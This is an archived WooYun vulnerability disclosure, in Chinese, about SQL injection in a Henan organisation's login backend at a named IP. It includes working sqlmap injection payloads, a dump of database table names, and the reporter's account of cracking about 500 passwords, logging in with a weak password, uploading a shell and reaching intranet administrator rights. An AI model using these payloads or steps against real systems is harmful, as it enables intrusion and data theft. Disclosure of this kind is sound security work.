乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-28: 细节已通知厂商并且等待厂商处理中 2015-02-02: 厂商已经确认,细节仅向厂商公开 2015-02-12: 细节向核心白帽子及相关领域专家公开 2015-02-22: 细节向普通白帽子公开 2015-03-04: 细节向实习白帽子公开 2015-03-14: 细节向公众公开
get me big
登录地址:http://218.28.234.10/
后台存在post注入 等多处注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: opID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: opID=forgetPsw' AND (SELECT 2629 FROM(SELECT COUNT(*),CONCAT(0x3a767a743a,(SELECT (CASE WHEN (2629=2629) THEN 1 ELSE 0 END)),0x3a6461773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Dyxr'='Dyxr&user=1 Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: opID=forgetPsw' LIMIT 1,1 UNION ALL SELECT 66, 66, 66, 66, 66, 66, 66, CONCAT(0x3a767a743a,0x4d766e4a477265616a78,0x3a6461773a), 66, 66, 66, 66#&user=1---Database: loms_v4_henan[123 tables]+-------------------------------------+| afs_cars || afs_reception_apply || afs_sendcar_apply || atd_law_holiday || atd_leave_apply || atd_work_status_log || aw_accessory || aw_accessory_apply_detail || aw_warehouse || aw_warehouse_accessory_apply || aw_warehouse_reserve || dss_favorite || dss_favoritetype || dss_sys_region || fa_asset_process_history || fa_fixed_asset_apply || fa_fixed_asset_detail || fa_fixed_asset_item || fa_office_supplies_apply || fa_office_supplies_item || flack_biz || oa_address_book || oa_file || oa_file_type || oa_from_doc || oa_linkman || oa_memo || oa_news || oa_notice || oa_notice_reply || oa_notice_right || oa_notice_user || oa_schedule || oa_to_doc || oa_work_log || process_archive_rights || process_archives || process_finish_tasks || process_instances || process_nodes || process_transitions || process_wait_tasks || sms_mo_daily || sms_mo_his || sms_mt_daily || sms_mt_his || sms_mt_temp || ss_article || ss_article_item || ss_article_provide || ss_article_receive || ss_info || ss_message || ss_msg_feedback || ss_perambulate || ss_perambulate_his || ss_perambulate_sign || ss_query || ss_query_question || ss_query_questionanswer || ss_query_response || ss_service_case || ss_service_result || ss_ticket_cancel || sys_attach_group || sys_attach_option || sys_attachment || sys_comm_configure || sys_common_option || sys_data_area || sys_datadict || sys_datatype || sys_department || sys_editable_columns || sys_free_space || sys_log || sys_maintain_user || sys_menu || sys_message_from || sys_message_to || sys_parameter || sys_region || sys_region_group || sys_region_right || sys_right || sys_role || sys_seal || sys_sign || sys_system || sys_user || sys_user_roles || sys_user_system || task_center_month_plan || task_center_year_plan || task_context || task_daily_task || task_dept_month_plan || task_dept_month_task || task_dept_year_plan || task_week_plan || teaching_material || tms_marketer_training || tms_praise_punish || tms_station || tms_station_addressmove || tms_station_apply || tms_station_cancel || tms_station_cancelticket || tms_station_change || tms_station_jxlbak_20120906 || tms_station_machine || tms_station_machine_jxlbak_20120906 || tms_station_map || tms_station_map_jxlbak_20120906 || tms_station_marketer || tms_station_master || tms_station_master_bak || tms_station_master_jxlbak_20120906 || tms_station_openclose || tms_station_relexsale || tms_station_type || work_employee || work_meeting |+-------------------------------------+
爆密码 约500+帐号
随便试了一个刚好我window下sqlmap中文不方便 有一个test用户密码还是弱口令 888888登录了报表什么都可以下载
此出改包上传
shell来一发内网+administrators 知道了把
内网+administrators 知道了把
修复sql注入和大量弱口令求20RANK 谢谢.
危害等级:高
漏洞Rank:12
确认时间:2015-02-02 08:28
CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心,由其后续协调网站管理单位处置.
暂无